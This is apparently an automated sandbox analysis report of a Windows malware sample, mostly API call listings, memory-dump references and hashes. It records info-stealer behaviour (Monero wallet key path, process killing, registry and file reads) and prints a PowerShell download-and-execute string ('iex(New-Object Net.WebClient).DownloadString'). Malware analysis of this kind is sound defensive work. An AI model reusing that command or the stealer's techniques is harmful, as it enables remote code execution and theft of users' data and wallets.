                                    • _ValidateLocalCookies.LIBCMT ref: 00C4FAB0
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00C4FADB
                                    • _ValidateLocalCookies.LIBCMT ref: 00C4FB30
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                    • String ID: csm
                                    • API String ID: 1170836740-1018135373
                                    • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                    • Instruction ID: f06758064568ae520027c696b28d848270931efc645cb30b6b40019242669b57
                                    • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                    • Instruction Fuzzy Hash: DB41A434900219EFCF10DF68C885A9E7BB5FF49314F248169ED28AB391D731DA46DB91
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00BD501A
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BD5021
                                    • InternetOpenA.WININET(00BF0DE3,00000000,00000000,00000000,00000000), ref: 00BD503A
                                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00BD5061
                                    • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00BD5091
                                    • InternetCloseHandle.WININET(?), ref: 00BD5109
                                    • InternetCloseHandle.WININET(?), ref: 00BD5116
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                    • String ID:
                                    • API String ID: 3066467675-0
                                    • Opcode ID: 422ab73a703b3314a5b4b238bdff7127408c8e11ab44004779eeb79a2325caf2
                                    • Instruction ID: 083e823f57a8c6673535bd419cfb8e568eb2ac981d81cddf61eabf93e0bd74ef
                                    • Opcode Fuzzy Hash: 422ab73a703b3314a5b4b238bdff7127408c8e11ab44004779eeb79a2325caf2
                                    • Instruction Fuzzy Hash: 5631F6B4A44218ABDB20CF54DC85BDDB7B4EB48304F1081D9FB09B7281D7706AC58F98
                                    APIs
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00BE85B6
                                    • wsprintfA.USER32 ref: 00BE85E9
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00BE860B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00BE861C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00BE8629
                                      • Part of subcall function 00BEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BEAAF6
                                    • RegQueryValueExA.ADVAPI32(00000000,018BDEF0,00000000,000F003F,?,00000400), ref: 00BE867C
                                    • lstrlen.KERNEL32(?), ref: 00BE8691
                                    • RegQueryValueExA.ADVAPI32(00000000,018BDCB0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00BF0B3C), ref: 00BE8729
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00BE8798
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00BE87AA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 3896182533-4073750446
                                    • Opcode ID: 097cd2ef5515c4f6f0557e8a9b9f1779b262cdbc32843009551c62dc4c81ebc9
                                    • Instruction ID: 086184d50cac36966955780cc050c7b6daf7416417b118924aadf1c3aeec753a
                                    • Opcode Fuzzy Hash: 097cd2ef5515c4f6f0557e8a9b9f1779b262cdbc32843009551c62dc4c81ebc9
                                    • Instruction Fuzzy Hash: F8211971A1021CAFDB24DB55DC85FE9B7B8FB48700F0081D8A649A6190DF706A85CFE4
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00BE99C5
                                    • Process32First.KERNEL32(00BDA056,00000128), ref: 00BE99D9
                                    • Process32Next.KERNEL32(00BDA056,00000128), ref: 00BE99F2
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BE9A4E
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00BE9A6C
                                    • CloseHandle.KERNEL32(00000000), ref: 00BE9A79
                                    • CloseHandle.KERNEL32(00BDA056), ref: 00BE9A88
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                    • String ID:
                                    • API String ID: 2696918072-0
                                    • Opcode ID: c7fb6372266242ed0c127a1cb488beed51412fdd8460fc6034a417c35a1c9ac1
                                    • Instruction ID: d181808a1c4a8a96e685606b18c3ab59b02041da0c7aecacc252033eeec6263a
                                    • Opcode Fuzzy Hash: c7fb6372266242ed0c127a1cb488beed51412fdd8460fc6034a417c35a1c9ac1
                                    • Instruction Fuzzy Hash: E221E975904218AFDB21DFA2DC88BDDB7B9BF49301F1041D8E509A6290D774AA88CF50
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BE7834
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BE783B
                                    • RegOpenKeyExA.ADVAPI32(80000002,018AB700,00000000,00020119,00000000), ref: 00BE786D
                                    • RegQueryValueExA.ADVAPI32(00000000,018BDC50,00000000,00000000,?,000000FF), ref: 00BE788E
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00BE7898
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: Windows 11
                                    • API String ID: 3225020163-2517555085
                                    • Opcode ID: 358440336625cf47959aee6a9c0580a974829d8c359a0087f3d7dd8d77e6349b
                                    • Instruction ID: 20868193a96ae574834374cddbcc11ec2e8b5398ffe8a83c8a0bfb7c84d8b8b1
                                    • Opcode Fuzzy Hash: 358440336625cf47959aee6a9c0580a974829d8c359a0087f3d7dd8d77e6349b
                                    • Instruction Fuzzy Hash: 0701F475A48305BFE700DBD6DD49F6D77B8EB49701F104194FA45B7291EB70A904CB60
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BE78C4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BE78CB
                                    • RegOpenKeyExA.ADVAPI32(80000002,018AB700,00000000,00020119,00BE7849), ref: 00BE78EB
                                    • RegQueryValueExA.ADVAPI32(00BE7849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00BE790A
                                    • RegCloseKey.ADVAPI32(00BE7849), ref: 00BE7914
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: CurrentBuildNumber
                                    • API String ID: 3225020163-1022791448
                                    • Opcode ID: 6f46914aca0867db3cd00ce541cb6cd292ca881ae3bd4e1112afa66113f56a21
                                    • Instruction ID: a839cc2d513d67ba662d39749cf5b8d055cbbe5a1c3aeb204fc3e311f318bf6e
                                    • Opcode Fuzzy Hash: 6f46914aca0867db3cd00ce541cb6cd292ca881ae3bd4e1112afa66113f56a21
                                    • Instruction Fuzzy Hash: 8B01F4B5A44309BFDB00DBD5DC49FAE77B8EF49700F104594F645B7291D7706A048BA0
                                    APIs
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BDA13C
                                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BDA161
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00BDA181
                                    • ReadFile.KERNEL32(000000FF,?,00000000,00BD148F,00000000), ref: 00BDA1AA
                                    • LocalFree.KERNEL32(00BD148F), ref: 00BDA1E0
                                    • CloseHandle.KERNEL32(000000FF), ref: 00BDA1EA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                    • String ID:
                                    • API String ID: 2311089104-0
                                    • Opcode ID: 63651cf3e3a99e48d605ad390ce20b4c9869a78dd6ca17e98c1e51879e607900
                                    • Instruction ID: 1ec0759daf3f709c9d23178270b44fe6a433cedc554656cbaacbf5bc33c72222
                                    • Opcode Fuzzy Hash: 63651cf3e3a99e48d605ad390ce20b4c9869a78dd6ca17e98c1e51879e607900
                                    • Instruction Fuzzy Hash: 9331CB74A00209EFDB14CFA5DC85BAEB7B5EB49304F108199E911B7390D774AA85CFA1
                                    APIs
                                    • lstrcat.KERNEL32(?,018BE1A8), ref: 00BE4A2B
                                      • Part of subcall function 00BE8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BE8F9B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00BE4A51
                                    • lstrcat.KERNEL32(?,?), ref: 00BE4A70
                                    • lstrcat.KERNEL32(?,?), ref: 00BE4A84
                                    • lstrcat.KERNEL32(?,018ABFB0), ref: 00BE4A97
                                    • lstrcat.KERNEL32(?,?), ref: 00BE4AAB
                                    • lstrcat.KERNEL32(?,018BDB10), ref: 00BE4ABF
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                      • Part of subcall function 00BE8F20: GetFileAttributesA.KERNEL32(00000000,?,00BD1B94,?,?,00BF577C,?,?,00BF0E22), ref: 00BE8F2F
                                      • Part of subcall function 00BE47C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00BE47D0
                                      • Part of subcall function 00BE47C0: RtlAllocateHeap.NTDLL(00000000), ref: 00BE47D7
                                      • Part of subcall function 00BE47C0: wsprintfA.USER32 ref: 00BE47F6
                                      • Part of subcall function 00BE47C0: FindFirstFileA.KERNEL32(?,?), ref: 00BE480D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                    • String ID:
                                    • API String ID: 2540262943-0
                                    • Opcode ID: 3b9986dbfcf7185ecbcb8d80fcecec7b6f3a01e0014245121687b396f6b3ccba
                                    • Instruction ID: 7f88a802a5cc6926c02edb26af04ebc3ded73f21b20e6a089614760afeedc9a4
                                    • Opcode Fuzzy Hash: 3b9986dbfcf7185ecbcb8d80fcecec7b6f3a01e0014245121687b396f6b3ccba
                                    • Instruction Fuzzy Hash: 363150F29002086BDB14EBB1DC85EDD737CAB58700F4049C9B249A6051EF74A78D8BA4
                                    APIs
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                      • Part of subcall function 00BEACC0: lstrlen.KERNEL32(?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BEACD5
                                      • Part of subcall function 00BEACC0: lstrcpy.KERNEL32(00000000), ref: 00BEAD14
                                      • Part of subcall function 00BEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BEAD22
                                      • Part of subcall function 00BEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BEAC82
                                      • Part of subcall function 00BEAC30: lstrcat.KERNEL32(00000000), ref: 00BEAC92
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00BE2FD5
                                    Strings
                                    • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00BE2F14
                                    • ')", xrefs: 00BE2F03
                                    • <, xrefs: 00BE2F89
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00BE2F54
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    • API String ID: 3031569214-898575020
                                    • Opcode ID: 85b0a3709e545cb44461120938171d15f24d4ea20c34f1aa0fa557efdefc9bf0
                                    • Instruction ID: ade4766c29bb61635faadf00932b28c1829bcd711d323332f25c01d5a0982e05
                                    • Opcode Fuzzy Hash: 85b0a3709e545cb44461120938171d15f24d4ea20c34f1aa0fa557efdefc9bf0
                                    • Instruction Fuzzy Hash: E341FA71D102489ADB14FFA1CCA2BEDBBF9AF14300F4144A9E116671A2EF743A49CF91
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,018BD970,00000000,00020119,?), ref: 00BE4344
                                    • RegQueryValueExA.ADVAPI32(?,018BE118,00000000,00000000,00000000,000000FF), ref: 00BE4368
                                    • RegCloseKey.ADVAPI32(?), ref: 00BE4372
                                    • lstrcat.KERNEL32(?,00000000), ref: 00BE4397
                                    • lstrcat.KERNEL32(?,018BE130), ref: 00BE43AB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$CloseOpenQueryValue
                                    • String ID:
                                    • API String ID: 690832082-0
                                    • Opcode ID: 43c8524e1b7fe9097fd854d060decb80f6c5dd93df45ae9b1682cb9fb7e8e71b
                                    • Instruction ID: 6efba38d7670ae6bfdaed9c49808bab7230c149a8709321e96350a5430129572
                                    • Opcode Fuzzy Hash: 43c8524e1b7fe9097fd854d060decb80f6c5dd93df45ae9b1682cb9fb7e8e71b
                                    • Instruction Fuzzy Hash: 204186B6900108AFDB14EBA0EC46FEE737CAB9D700F048999B61556181EB75678C8BA1
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: dllmain_raw$dllmain_crt_dispatch
                                    • String ID:
                                    • API String ID: 3136044242-0
                                    • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                    • Instruction ID: ebc1e450caaa69248d99a912f3f2db10e113d0f647eba18ff48f99c254c20d06
                                    • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                    • Instruction Fuzzy Hash: 2D219072D42628AFDBA19F55CCC197F3A79FB81B90F054119F82967231C7308E419BE0
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BE7FC7
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BE7FCE
                                    • RegOpenKeyExA.ADVAPI32(80000002,018AB818,00000000,00020119,?), ref: 00BE7FEE
                                    • RegQueryValueExA.ADVAPI32(?,018BD830,00000000,00000000,000000FF,000000FF), ref: 00BE800F
                                    • RegCloseKey.ADVAPI32(?), ref: 00BE8022
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: 557f7303d8b83c23930c81693ea3b28a5e7ee5c0cbdb41aa93dd6a80409b8281
                                    • Instruction ID: 3810cc7b784f365696ecac634484b97e57cb24f76cbaaa80a9c5d127116b8bb8
                                    • Opcode Fuzzy Hash: 557f7303d8b83c23930c81693ea3b28a5e7ee5c0cbdb41aa93dd6a80409b8281
                                    • Instruction Fuzzy Hash: 451191B2A44205EFD700CF86DD85FBFBBB8EB49B10F104159F615B7290D77569048BA0
                                    APIs
                                    • StrStrA.SHLWAPI(018BDDB8,00000000,00000000,?,00BD9F71,00000000,018BDDB8,00000000), ref: 00BE93FC
                                    • lstrcpyn.KERNEL32(00EA7580,018BDDB8,018BDDB8,?,00BD9F71,00000000,018BDDB8), ref: 00BE9420
                                    • lstrlen.KERNEL32(00000000,?,00BD9F71,00000000,018BDDB8), ref: 00BE9437
                                    • wsprintfA.USER32 ref: 00BE9457
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpynlstrlenwsprintf
                                    • String ID: %s%s
                                    • API String ID: 1206339513-3252725368
                                    • Opcode ID: 32b482df778b0300dbfcb73dbe667b1cb3be6db92e7e70aa7268c85ff4570cd9
                                    • Instruction ID: 5d197024963a668a9ff1be38476fa29eef70a99ef07dce4b3b6a905e4b38d02a
                                    • Opcode Fuzzy Hash: 32b482df778b0300dbfcb73dbe667b1cb3be6db92e7e70aa7268c85ff4570cd9
                                    • Instruction Fuzzy Hash: E1010C75604108FFCB04DFA9DD85AAE7BB8EB49304F108288F949AB251D731AA44DB90
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BD12B4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BD12BB
                                    • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00BD12D7
                                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00BD12F5
                                    • RegCloseKey.ADVAPI32(?), ref: 00BD12FF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
